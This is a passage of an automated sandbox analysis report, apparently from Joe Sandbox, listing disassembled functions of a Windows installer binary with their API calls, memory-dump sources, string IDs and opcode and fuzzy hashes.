                                                                                                        • Opcode ID: 74cf1b5b9302f0e17e355b9ba2feb6e36dffe30214ad1f9742bf787ae2c4f720
                                                                                                        • Instruction ID: 98efe88fef01fa75a8cfcbcffdbbf8997df7788abb5f189528c156f08a532cab
                                                                                                        • Opcode Fuzzy Hash: 74cf1b5b9302f0e17e355b9ba2feb6e36dffe30214ad1f9742bf787ae2c4f720
                                                                                                        • Instruction Fuzzy Hash: D8F0E031D355246BDB113F669D01BBA37D99F81764B1CA023A81DF7093DF22D80157D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00C9A9B0 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 291 c9a9b0-c9aa0e call c9a9a0 call e71aea RtlAllocateHeap
                                                                                                        APIs
                                                                                                          • Part of subcall function 00E71AEA: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000009,?,00000009,?,00E6D7B0,00000009,00F865FC,00000000,00000009), ref: 00E71B4A
                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,CA4F4AE5,00000000,00E97E40,000000FF,?,?,00F8717C,?,00C911E6,80004005,CA4F4AE5,?,00E9A90F), ref: 00C9A9FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateExceptionHeapRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3789339297-0
                                                                                                        • Opcode ID: b162408fdc90ee697365e2324350f54825deca84c607740aae02bed00aebbd0c
                                                                                                        • Instruction ID: d646c68c92b756900f4cd5ebc045d3b5d68b1f4078dadd99f1bef027269f81a8
                                                                                                        • Opcode Fuzzy Hash: b162408fdc90ee697365e2324350f54825deca84c607740aae02bed00aebbd0c
                                                                                                        • Instruction Fuzzy Hash: 7FF0A731648748FFCB01DF54DD06FA6BBA8F708B50F10856DF919D6690DB35A800DB45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E881B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 296 e881b8-e881c4 297 e881f6-e88201 call e752ff 296->297 298 e881c6-e881c8 296->298 306 e88203-e88205 297->306 299 e881ca-e881cb 298->299 300 e881e1-e881f2 RtlAllocateHeap 298->300 299->300 302 e881cd-e881d4 call e8792b 300->302 303 e881f4 300->303 302->297 308 e881d6-e881df call e85443 302->308 303->306 308->297 308->300
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00000009,?,00E7142C,0000000B,00000009,00000009,?,?,00CA079C,0000000D,0000000D), ref: 00E881EA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: c10dcc3ded1b2e3b57b2fc72737f2d43a0bd66bc495368a265e2cf1a510b4eb2
                                                                                                        • Instruction ID: 9579681e094c52b647fedbceb44fe71d25e2c9779ffae9f775c9d33de312f238
                                                                                                        • Opcode Fuzzy Hash: c10dcc3ded1b2e3b57b2fc72737f2d43a0bd66bc495368a265e2cf1a510b4eb2
                                                                                                        • Instruction Fuzzy Hash: ADE0E5316036225AD7303A669E08B9B77999B413A4F613110EC1DF30D1DF10DC0383E5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00C93000 Relevance: 170.7, Strings: 134, Instructions: 3218COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 100$10000$100000$12000$120000$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$800$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppSearch$BindImage$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileCost$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
                                                                                                        • API String ID: 0-2910470256
                                                                                                        • Opcode ID: 49e0ae01e795070e5043b4a3ddcb860b3590ba6421ea1147d8f445d25fbdc224
                                                                                                        • Instruction ID: 638d80db697aa29fccce1a05e862b33f3db88028a74e5f4007c4b5e7520868ae
                                                                                                        • Opcode Fuzzy Hash: 49e0ae01e795070e5043b4a3ddcb860b3590ba6421ea1147d8f445d25fbdc224
                                                                                                        • Instruction Fuzzy Hash: AF73D920E4538AF6EB81DF749D1979D7A51AB63704F20435AF1402B2E2DFB41AC8B7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CA1000 Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00CA10F4
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00CA1169
                                                                                                        • GetProcessHeap.KERNEL32(?,?), ref: 00CA11D9
                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 00CA11DF
                                                                                                        • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,CA4F4AE5), ref: 00CA120C
                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,CA4F4AE5), ref: 00CA1212
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00CA122A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Free$Heap$String$Process
                                                                                                        • String ID:
                                                                                                        • API String ID: 2680101141-0
                                                                                                        • Opcode ID: c415f1f8f09df5736013ac96c3dad6cab7907f23a63cd8c36b30f4e2a4c2f3a1
                                                                                                        • Instruction ID: 74df00f9c80d4eaf591313a3be52993273cf100a80c4991844f7b1f77a1c7c90
                                                                                                        • Opcode Fuzzy Hash: c415f1f8f09df5736013ac96c3dad6cab7907f23a63cd8c36b30f4e2a4c2f3a1
                                                                                                        • Instruction Fuzzy Hash: 24815B70D0025ADFDF10DFA8C945BAEBBF4AF16314F284659E920BB281D7759E04CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00C9F926 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,.dll,?,00000000), ref: 00C9F96B
                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00C9F9B4
                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,?,?,?,?,.dll,?,00000000), ref: 00C9FA02
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                        • String ID: .dll$DllGetActivationFactory
                                                                                                        • API String ID: 145871493-1250754257
                                                                                                        • Opcode ID: f1f706379042d4372b67735b58d7567347f51d6789cd9ee290105128d39b30cf
                                                                                                        • Instruction ID: 9ccedc2234506c6f909576361991089443f928bf5a13a0544ce588d35cf7db66
                                                                                                        • Opcode Fuzzy Hash: f1f706379042d4372b67735b58d7567347f51d6789cd9ee290105128d39b30cf
                                                                                                        • Instruction Fuzzy Hash: 50516C30D04209EEDF15DFA8C899BEDFBB1AF54304F24812DE421E7291DB706A46DB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E6F583 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00CAAD10: InitializeCriticalSectionAndSpinCount.KERNEL32(00F8FEF0,00000000,CA4F4AE5,00C90000,00E97E40,000000FF,?,00E6F5B2,?,?,?,00C97726), ref: 00CAAD35
                                                                                                          • Part of subcall function 00CAAD10: GetLastError.KERNEL32(?,00E6F5B2,?,?,?,00C97726), ref: 00CAAD3F
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00C97726), ref: 00E6F5B6
                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C97726), ref: 00E6F5C5
                                                                                                        Strings
                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E6F5C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                        • API String ID: 450123788-631824599
                                                                                                        • Opcode ID: 6425b55a247e4ea0de557563a04c7f04ac2dd89b2cf338aec21637670f2b0193
                                                                                                        • Instruction ID: e26794b086e6435e90169f873b08162261a7738883d250d1c43ddf89b8df0002
                                                                                                        • Opcode Fuzzy Hash: 6425b55a247e4ea0de557563a04c7f04ac2dd89b2cf338aec21637670f2b0193
                                                                                                        • Instruction Fuzzy Hash: 4EE092B02017158FD360AF69FA083527BF4AF04344F205D2DE483E3690EBB1E848CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00C97620 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32 ref: 00E69808
                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00E69853
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00E69867
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Version$FeaturePresentProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 1871528217-0
                                                                                                        • Opcode ID: 005a68b9e12099997dbd5362f095eed44bdc97ba45a365f8af202f014c50d819
                                                                                                        • Instruction ID: 1aa26c899318b8a20b7d209910961ece3bdb0e58f92f29bdaf62f79851fe020f
                                                                                                        • Opcode Fuzzy Hash: 005a68b9e12099997dbd5362f095eed44bdc97ba45a365f8af202f014c50d819
                                                                                                        • Instruction Fuzzy Hash: 1B614A31B106244FE30CCF2DEC916AABBD5EBC9385F05463EE486E7291D678C509DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E74FE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00E750DB
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00E750E5
                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000001), ref: 00E750F2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 582cd0fb32d2080d69a1bd40471aded3150591b6acb18b6d82258e5c1d105b94
                                                                                                        • Instruction ID: 3067f1eea781d6e1204f2f0a9d3af834c325e51797f23a9206664786fecc6cc2
                                                                                                        • Opcode Fuzzy Hash: 582cd0fb32d2080d69a1bd40471aded3150591b6acb18b6d82258e5c1d105b94
                                                                                                        • Instruction Fuzzy Hash: 1931D27590132C9BCB21DF68DD897DDBBB8BF08310F6091EAE40CA6261E7709B858F44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00C9A160 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadResource.KERNEL32(00000000,00000000,CA4F4AE5,00000001,00000000,?,00000000,00E97BF0,000000FF,?,00C9A10C,?,?,?,http://,00E982C0), ref: 00C9A18B
                                                                                                        • LockResource.KERNEL32(00000000,?,00C9A10C,?,?,?,http://,00E982C0,000000FF,?,00C9A2B0,?,?,?,00C9124B,http://), ref: 00C9A196
                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00C9A10C,?,?,?,http://,00E982C0,000000FF,?,00C9A2B0,?,?,?,00C9124B), ref: 00C9A1A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$LoadLockSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 2853612939-0
                                                                                                        • Opcode ID: b65128c934a89b9e730c4198ff6faae4f50a15e1857d2191306af6af9fd9253b
                                                                                                        • Instruction ID: 4a5b76afe31036a8e803f8fe68c1e0aef26b36ec305c0d3a0cc80822f81f8d01
                                                                                                        • Opcode Fuzzy Hash: b65128c934a89b9e730c4198ff6faae4f50a15e1857d2191306af6af9fd9253b
                                                                                                        • Instruction Fuzzy Hash: 9011E736A04654DFCB209F69DC48B7AB7E8E788720F204A2BEC1AD3250EA359D00C6D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E89D47 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00E87525,?,20001004,00000000,00000002,?,?,00E86B27), ref: 00E89D7B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: e6afe444e4bd137f8aa730af8e872b117c14b68035a7d608ab8312440eea66d7
                                                                                                        • Instruction ID: c68fa73fbff59d5e1b49828cbfb6671449214c193cfc1e6fd08d6cf678eda158
                                                                                                        • Opcode Fuzzy Hash: e6afe444e4bd137f8aa730af8e872b117c14b68035a7d608ab8312440eea66d7
                                                                                                        • Instruction Fuzzy Hash: 01E01A31901618BBCF123FA1DC04EBE7A69EF85750F285011F91D75162CB328921AB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CCB910 Relevance: .7, Instructions: 662COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 463b922c169c310d8d5c31bfb6a64cca585bd2cd0700b43f751d79f24aa5a78c
                                                                                                        • Instruction ID: 3c8960d2ae7c3a57397610ace0878f0e2b5c6a8872154b7c9d7a62b87da2108e
                                                                                                        • Opcode Fuzzy Hash: 463b922c169c310d8d5c31bfb6a64cca585bd2cd0700b43f751d79f24aa5a78c
                                                                                                        • Instruction Fuzzy Hash: 45226F71A006099FCB18DF6DD985AAEBBF5FB88310F54422DE815E7341EB30AE15CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CA6CD0 Relevance: .1, Instructions: 140COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e6720130c09452b38c93256973aa825cd776a44bc67977b28f75e96f0e4bc611
                                                                                                        • Instruction ID: 8865db99eb86abc2bc7427e174cd6342f1f2123d75f7872937b8656fd6cc5dbb
                                                                                                        • Opcode Fuzzy Hash: e6720130c09452b38c93256973aa825cd776a44bc67977b28f75e96f0e4bc611
                                                                                                        • Instruction Fuzzy Hash: 5F71F6B1801B48CFE761CF78C94478ABBF0BB05324F148A5DD5A99B3D1D3B9A648CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E8A04C Relevance: .0, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
